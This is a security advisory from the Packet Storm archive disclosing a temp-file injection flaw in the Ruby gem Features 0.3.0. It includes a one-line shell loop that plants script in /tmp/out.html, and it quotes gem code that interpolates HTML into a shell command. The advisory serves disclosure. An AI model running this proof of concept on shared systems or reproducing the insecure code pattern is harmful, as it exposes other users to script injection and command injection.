what you don't know can hurt you

Ruby Gem Features 0.3.0 Injection

Ruby Gem Features 0.3.0 Injection
Posted Sep 9, 2013
Authored by Larry W. Cashdollar

Ruby Gem Features version 0.3.0 suffers from a file injection vulnerability that can lead to cross site scripting.

tags | exploit, xss, ruby
MD5 | cda6fa9ea76cdb6b437f75ce82bada8e

Ruby Gem Features 0.3.0 Injection

Change Mirror Download
Title: Features 0.3.0 Ruby gem file injection vulnerability
Date: 9/1/2013
Author: Larry W. Cashdollar @_larry0 
Download: http://rubygems.org/gems/features
Description: "Plaintext User Stories Parser supporting native programming languages. Especially Objective-C"

Same vulnerability as http://vapid.dhs.org/advisories/show_in_browser.html

By a malicious user creating /tmp/out.html first and repeatedly writing to it they can inject malicious html into the file right before it is about to be opened.

PoC:
nobody () sp0rk:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/out.html; done
Will pop up a java script alert in other gem users browser. 
Code:
+--------------------[./features-0.3.0/lib/suite.rb]-------------------+

html = parse_results(results).html

%x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' ) end

def parse_results_and_open_in_safari(results) -- end

def open_in_safari(html)
%x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' ) end

Vendor: Not notified

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2015

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    2 Files
  • 2
    Feb 2nd
    17 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    16 Files
  • 5
    Feb 5th
    14 Files
  • 6
    Feb 6th
    4 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2015 Packet Storm. All rights reserved.

close